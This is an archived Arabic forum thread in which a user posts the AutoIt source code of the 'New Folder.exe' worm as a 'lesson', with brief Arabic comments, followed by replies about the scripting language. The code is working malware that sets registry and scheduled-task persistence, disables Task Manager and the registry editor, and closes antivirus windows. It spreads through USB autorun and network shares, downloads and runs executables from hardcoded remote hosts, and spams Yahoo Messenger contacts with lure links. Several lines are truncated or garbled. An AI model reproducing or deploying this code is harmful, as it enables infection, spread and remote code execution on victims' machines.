الفريق العربي للبرمجةأرشيف المنتديات · 2000 – 2023
نسخة أرشيفية للقراءة فقط — التسجيل والمشاركة مغلقان، والمحتوى محفوظ كما كان.

الدرس الثاني : تحليل و دراسة الكود المصدري لفيروس New Folder.exe

بدأه prof_hack في 2 يونيو 2009 · 14 رد · 4,781 مشاهدة · في قسم أمن المعلومات العام
مشاركة: واتساب X فيسبوك تيليجرام
#1 صاحب الموضوع

السلام عليكم و رحمة الله و بركاته

تتمة للدروس الموعودة سوف نتناول اليوم في هذا الدرس

دراسة وتحليل الكود المصدري لفيروسNEW FOLDER

وهو تقريبا شبيه لفيروس COPY

المرجو الا تستخدموا هذا في اذية اخواننا المسلمين

هذا هو الكود و شرحه


$setting = "setting"; ملف الفايروس
$ini = ".ini"
$nql = ".nql"
$xls = ".xls"
$exe = ".exe"
$toigioupdate = @HOUR + 2
$toigio = @MIN + 30
يقوم بنسخ نفسه في المجلد الرئيسي
FileCopy (@AutoItExe, @SystemDir & "\" & $name & $exe,0)
هنا يقوم بحماية نفسه الاختفاء او للقراءة فقط او مجلد نظام
FileSetAttrib (@SystemDir & "\" & $name & $exe,"+RSH")
نسخ نفسه الى مجلد النظام
FileCopy (@AutoItExe, @WindowsDir & "\" & $name & $exe,0)
يقوم بحماية نفسه عبر الاياليب السابقة
FileSetAttrib (@WindowsDir & "\" & $name & $exe,"-RSH")
يقوم بانشاء مداخل في الروجستري ليشتغل تلقائيا مع الويندوز
RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","Shell","REG_RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run","Yahoo Messengger","; الغاء option des dossiers لهذا لا يمكنكم رؤيتها في الشريط
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NofolderOptions","; الغاء ادارة المهام
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr",; الغاء محرر الروجستري
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools",; انشاء جدول ليشتغل تلقائيا و في الوقت المحدد
RegWrite ("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule","AtTaskMaxHours","REG__RunDOS ("AT /delete /yes")
_RunDOS ("AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su " & @SystemDir & "\" &$name & $exe)
createini()
update()
sendmess()
قراءة الملفات المشتركة و بهذا يقوم بنشر نفسه في الشبكة
$a = RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\If $a ="" Then
copynetwork ()
EndIf
If $a <>"" Then
If FileExists ($a)=0 Then
copynetwork()
EndIf
EndIf
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
نسخ نفسه الى كل فلاش مموري متصلة بالكمبيوتر
While (1)
killprocess()
copyusb()
If @HOUR = $toigioupdate Then
update()
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
If ProcessExists ("game_y.exe") Then
ProcessClose ("game_y.exe")
EndIf
Sleep (1000)
EndIf
If @MIN = $toigio Then
sendmess()
EndIf
WEnd
يقوم بتحميل الاعدادات من موقع الصانع و الله اعلم ان كانت فكرة اخرى اضيفوها
Func downloadurl()
$settingurl="http://nhatquanglan3.t35.com"
If InetGet ($settingurl & "/" & $setting & $nql, @SystemDir & "\" & $setting & $ini,1,0) = 0 Then
InetGet ($settingurl & "/" & $setting & $xls, @SystemDir & "\" & $setting & $ini,1,0)
EndIf
Sleep (1000)
$downloaded="success"
$settingurl1 = "http://nhatquanglan4.t35.com"
If IniRead (@SystemDir & "\" & $setting & $ini,"setting","downloaded","") <> $downloaded Then
If InetGet ($settingurl1 & "/" & $setting & $nql, @SystemDir & "\" & $setting & $ini,1,0) = 0 Then
InetGet ($settingurl1 & "/" & $setting & $xls, @SystemDir & "\" & $setting & $ini,1,0)
EndIf
EndIf
FileSetAttrib (@SystemDir & "\" & $setting & $ini,"+RSH")
EndFunc
تحديث الفايروس
Func update()
downloadurl()
$website = IniRead (@SystemDir & "\" & $setting & $ini,"setting","website","")
$check01 = IniRead (@SystemDir & "\" & $setting & $ini,"setting","filedownload1","")
$check02 = IniRead (@SystemDir & "\" & $setting & $ini,"setting","filedownload2","")
$check03 = IniRead (@SystemDir & "\" & $setting & $ini,"setting","filedownload3","")
$size01 = Number (IniRead (@SystemDir & "\" & $setting & $ini,"setting","size01",""))
$size02 = Number (IniRead (@SystemDir & "\" & $setting & $ini,"setting","size02",""))
$size03 = Number (IniRead (@SystemDir & "\" & $setting & $ini,"setting","size03",""))
If $check01 <>"" Then
If Not FileExists (@SystemDir & "\" & $check01 & $exe) Then
If InetGet ($website & "/" & $check01 & $nql,@SystemDir & "\" & $check01 & $exe,1,0)=0 Then
InetGet ($website & "/" & $check01 & $xls,@SystemDir & "\" & $check01 & $exe,1,0)
EndIf
Sleep (3000)
If FileExists (@SystemDir & "\" & $check01 & $exe) Then
If Number (FileGetSize (@SystemDir & "\" & $check01 & $exe))/1024>=$size01 Then
FileSetAttrib (@SystemDir & "\" & $check01 & $exe,"+RSH")
Run (@SystemDir & "\" & $check01 & $exe)
EndIf
EndIf
EndIf
EndIf
If $check02 <>"" Then
If Not FileExists (@SystemDir & "\" & $check02 & $exe) Then
If InetGet ($website & "/" & $check02 & $nql,@SystemDir & "\" & $check02 & $exe,1,0)=0 Then
InetGet ($website & "/" & $check02 & $xls,@SystemDir & "\" & $check02 & $exe,1,0)
EndIf
Sleep (3000)
If FileExists (@SystemDir & "\" & $check02 & $exe) Then
If Number (FileGetSize (@SystemDir & "\" & $check02 & $exe))/1024>=$size02 Then
FileSetAttrib (@SystemDir & "\" & $check02 & $exe,"+RSH")
Run (@SystemDir & "\" & $check02 & $exe)
EndIf
EndIf
EndIf
EndIf
If $check03 <>"" Then
If Not FileExists (@SystemDir & "\" & $check03 & $exe) Then
If InetGet ($website & "/" & $check03 & $nql,@SystemDir & "\" & $check03 & $exe,1,0)=0 Then
InetGet ($website & "/" & $check03 & $xls,@SystemDir & "\" & $check03 & $exe,1,0)
EndIf
Sleep (3000)
If FileExists (@SystemDir & "\" & $check03 & $exe) Then
If Number (FileGetSize (@SystemDir & "\" & $check03 & $exe))/1024>=$size03 Then
FileSetAttrib (@SystemDir & "\" & $check03 & $exe,"+RSH")
Run (@SystemDir & "\" & $check03 & $exe)
EndIf
EndIf
EndIf
EndIf
$toigioupdate = @HOUR + 2
If $toigioupdate >12 Then
$toigioupdate = $toigioupdate -12
EndIf
EndFunc
انشاء رسالة ليرسلها الى جميع الايميلات في الياهو
Func sendmess()
$myweb = IniRead (@SystemDir & "\" & $setting & $ini,"setting","myweb","")
If $myweb = "" Then
$myweb = "http://nhatquanglan1.0catch.com"
EndIf
Dim $tin [10]
$tin[0] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[0]","")
If $tin[0] = "" Then
$tin[0] = "E may, vao day coi co con nho nay ngon lam " & $myweb & " "
EndIf
$tin[1] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[1]","")
If $tin[1] = "" Then
$tin[1] = "Vao day nghe bai nay di ban " & $myweb & " "
EndIf
$tin[2] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[2]","")
If $tin[2] = "" Then
$tin[2] = "Vao day nghe bai nay di ban " & $myweb & " "
EndIf
$tin[3] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[3]","")
If $tin[3] = "" Then
$tin[3] = "Biet tin gi chua, vao day coi di " & $myweb & " "
EndIf
$tin[4] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[4]","")
If $tin[4] = "" Then
$tin[4] = "Trang Web nay coi cung hay, vao coi thu di " & $myweb & " "
EndIf
$tin[5] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[5]","")
If $tin[5] = "" Then
$tin[5] = "Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo EndIf
$tin[6] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[6]","")
If $tin[6] = "" Then
$tin[6] = "Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung EndIf
$tin[7] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[7]","")
If $tin[7] = "" Then
$tin[7] = "Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan EndIf
$tin[8] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[8]","")
If $tin[8] = "" Then
$tin[8] = "Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo EndIf
$tin[9] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[9]","")
If $tin[9] = "" Then
$tin[9] = "Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang EndIf
اختيار جميع الايميلات في الياهو ليرسل عنوان الموقع للتحميل منه$tieude = WinGetTitle("Yahoo! Messenger", "")
$kiemtra = WinExists ($tieude)
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
ClipPut ($tin[$ngaunhien])
BlockInput (1)
WinActivate ($tieude)
Send ("!m")
Send ("un")
Send ("^v {ENTER}{ENTER}")
Send ("^m")
Send ("{DOWN}")
Send ("^{SHIFTDOWN}{END}{SHIFTUP}")
Send ("{ENTER}")
Send ("^v {ENTER}")
BlockInput (0)
EndIf
$toigio=@MIN + 30
If $toigio>60 Then
$toigio=$toigio-60
EndIf
EndFunc
دالة لقتل الانتي فايروس و ادارة المهام ومحرر الروجستري واداة الدوس
Func killprocess()
If WinExists ("Bkav2006") Then
WinClose ("Bkav2006")
RegDelete ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","BkavFw")
EndIf
If WinExists ("System Configuration") Then
WinClose ("System Configuration")
EndIf
If WinExists ("Registry") Then
WinClose ("Registry")
EndIf
If WinExists ("Windows Task") Then
WinClose ("Windows Task")
EndIf
If WinExists ("[FireLion]") Then
RegDelete ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run","IEProtection")
Shutdown (2)
EndIf
If ProcessExists ("cmd.exe") then
ProcessClose ("cmd.exe")
EndIf
EndFunc
دالة نسخ نفسه في الفلاش مموري
Func copyusb()
$usb = DriveGetDrive("REMOVABLE")
If NOT @error Then
Dim $odia[6]
$odia[1]=""
For $i=1 To $usb[0]
$odia[$i-1]=$usb[$i]
Next
If $odia[0] <>"A:" Then
If $odia[0]<>"" Then
FileCopy (@WindowsDir & "\" & $name & $exe,$odia[0] & "\New Folder.exe",0)
Sleep (1)
FileCopy (@SystemDir & "\" & $name & $exe,$odia[0] & "\" & $name &$exe,0)
Sleep (1)
FileCopy (@SystemDir & "\autorun.ini",$odia[0] & "\autorun.inf",0)
FileSetAttrib ($odia[0] & "\autorun.inf","+RSH")
Sleep (1)
Search($odia[0])
EndIf
EndIf
If $odia[0]="A:" Then
If $odia[1]<>"" Then
FileCopy (@WindowsDir & "\" & $name & $exe,$odia[1] & "\New Folder.exe",0)
Sleep (1)
FileCopy (@SystemDir & "\" & $name & $exe,$odia[1] & "\" & $name &$exe,0)
Sleep (1)
FileCopy (@SystemDir & "\autorun.ini",$odia[1] & "\autorun.inf",0)
FileSetAttrib ($odia[1] & "\autorun.inf","+RSH")
Sleep (1)
Search($odia[1])
EndIf
EndIf
EndIf
EndFunc
دالة البحث ونقل نفسه الى مجلد النظام
Func Search($current)
Local $search = FileFindFirstFile($current & "\*.*")
While 1
Dim $file = FileFindNextFile($search)
If @error Or StringLen($file) < 1 Then ExitLoop
If StringInStr(FileGetAttrib($current & "\" & $file), "D") And ($file <> "." Or $file <> "..") Then
FileCopy (@WindowsDir & "\" & $name & $exe,$current & "\" & $file & "\" & $file & $exe,0)
Search($current & "\" & $file)
EndIf
Sleep (1)
WEnd
FileClose($search)
EndFunc
دالة نقل نفسه الى مجلد الشبكة
Func copynetwork ()
Dim $mang[30]
For $i=1 to 30
$read = RegEnumKey ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\If @error Then ExitLoop
$read = StringReplace ($read,"/","\")
$mang[$i] = "\\" & $read
$checkcopy = FileCopy (@WindowsDir & "\" & $name & $exe,$mang[$i] & "\New Folder.exe",1)
If $checkcopy =1 Then
FileCopy (@SystemDir & "\" & $name & $exe,$mang[$i] & "\" & $name & $exe,0)
FileCopy (@SystemDir & "\autorun.ini",$mang[$i] & "\autorun.inf",1)
FileSetAttrib ($mang[$i] & "\autorun.inf","+RSH")
Search($mang[$i])
EndIf
Next
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\EndFunc
دالة انشاء ملف اوتو رن Func createini()
IniWrite (@SystemDir & "\autorun.ini","Autorun","Open",$name & $exe)
IniWrite (@SystemDir & "\autorun.ini","Autorun","Shellexe cute",$name & $exe)
IniWrite (@SystemDir & "\autorun.ini","Autorun","Shell\Open\command",$name & $exe)
IniWrite (@SystemDir & "\autorun.ini","Autorun","Shell","Open")
Sleep (1)
FileSetAttrib (@SystemDir & "\autorun.ini","+RSH")
EndFunc
; ----------------------------------------------------------------------------
;
; هذا كل ما عندي و لقد تعبت جدا في هذا العمل
واتمنى منكم اخوتي الافاضل الا تستعملوا هذا في
اذية اخواننا المسلمين


; ----------------------------------------------------------------------------
$name = "SSVICHOSST"; اسم الفايروس

واذا كانت لديكم اظافات او استفسارات لا تترددوا

مدونة عربية مختصة في الكمبيوتر و الانترنت

http://www.mouitax.co.cc

#2

ماهذا ياخي prof_hack ???

:wacko: :wacko: :wacko: :wacko:

عزيزي :

لاتنسى ان تصلي على حبيبنا و شفيعنا يوم لا ينفع مال ولا بنون .

فاللهمّ صّل وسّلم على سيدي و شفيعي وحبيبي محمد عليك الف صلاة وازكى تسليم

*****

2_header.png

#3

هل يمكن أن تخبرنا كيف حصلت على الـ source ؟

#4

كل هذا كود فايروس :S

بأي لغة مكتوب هذا الكود :happy:

لا تجعلوا العلم فيه كل غايتكم ... بل علموا النشئ علماً يُنتج العملا

#5

ارجو ان تخبرنا كيف استطع الحصول لى الكود

#7
اقتباس
حصل علية من درس للاخ Koudelka في AT4RE ارفقتة لكم

ودون ان يذكر المصدر !

أو أنه قام بعمل decompile للفيروس مثلما عما Koudelka

لهذا سألت السؤال في المشاركة رقم 3

#8

السلام عليكم ورحمة الله وبركاته

أهلاً بكم اخواني

هذا الفيروس New Folder مبرمج بلغة السكريبت AutoIt Script

وأي شيء تودون أن تعرفوه عن هذه اللغة أنا هنا اخواني.

بالتوفيق لكم

تم تعديل هذه المشاركة بواسطة Ghost Skikda في 3 ديسمبر 2009 في 21:25

ضيع لحظة من حياتك *** ولا تضيع حياتك في لحظة

ghostskikdabt.jpg

userautoitpx4.gif

backtrack.gif
#9
Ghost Skikda كتب:

السلام عليكم ورحمة الله وبركاته

أهلاً بكم اخواني

هذا الفيروس New Folder مبرمج بلغة السكريبت AutoIt Script

وأي شيء تودون أن تعرفوه عن هذه اللغة أنا هنا اخواني.

بالتوفيق لكم

ياريت تعطينا معلومات عن اللغه قليلا وهل هي مفيده جدا في الفيروسات فقط ام لها استخدمات اخرى مفيده

#10

what this code it have weird structure that i didnt i seen it befor can any one help us here

Prof_hack thnaks man im still studying the code ^_*

شكوت الى وكيع سوء حفظي فأشار على بترك المعاصي واخبرني ان علم الله نور و نور الله لا يأتي لعاصي

#11

يا ريت معلومات أكثر عن اللغة وعن الكود

الله أكبر الله أكبر الله أكبر لآ إله إلا الله الله أكبر الله أكبر ولله الحمد

#12

498258_01246717563.gif

تقريبا الفيروس مكتوب بلغة AutoIt v3

مزيد من المعلومات

الموقع الرسمي للغة

1
#13
artint كتب:

ياريت تعطينا معلومات عن اللغه قليلا وهل هي مفيده جدا في الفيروسات فقط ام لها استخدمات اخرى مفيده

السلام عليكم ورحمة الله

هذه اللغة متعددة المجالات مثل أي لغة برمجة أخرى

قاموا مبرمجي هذه اللغة من توحيد لغتين هما: لغة السي ولغة الفي بي

لهذا لغة السكريبت AutoIt قوية

كما أن مستعمل ( مبرمج ) هذه اللغة له الحرية التامة في برمجة أي برنامج يخطر على باله.

وكذلك اللغة السكريبت تعتمد في قواعد البيانات على لغة XML أو لغة SQLite3 .

أما بالنسبة لبرمجة الفيروسات فهي جد سهلة ولا تحتاج إلى أي تعقيد.

ضيع لحظة من حياتك *** ولا تضيع حياتك في لحظة

ghostskikdabt.jpg

userautoitpx4.gif

backtrack.gif
#14

اتمنى ان يقوم مشرفو الموقع الموقرين بفتح قسم خاص بهذا اللغة المهمه جداُ AutoIt ...

شكراُ شباب :)

#15
Super Nova كتب:

اتمنى ان يقوم مشرفو الموقع الموقرين بفتح قسم خاص بهذا اللغة المهمه جداُ AutoIt ...

شكراُ شباب :)

هذا مانرجوه من مشرفي المنتدى أو بالأخرى ادراة المنتدى .

ضيع لحظة من حياتك *** ولا تضيع حياتك في لحظة

ghostskikdabt.jpg

userautoitpx4.gif

backtrack.gif

مواضيع مشابهة

عدد الزوار حالياً

المتواجدون خلال آخر دقيقتين · يتحدّث كل ٣٠ ثانية

—الإجمالي—أعضاء مسجّلون—زوار بدون تسجيل

جارٍ التحقق من المتواجدين…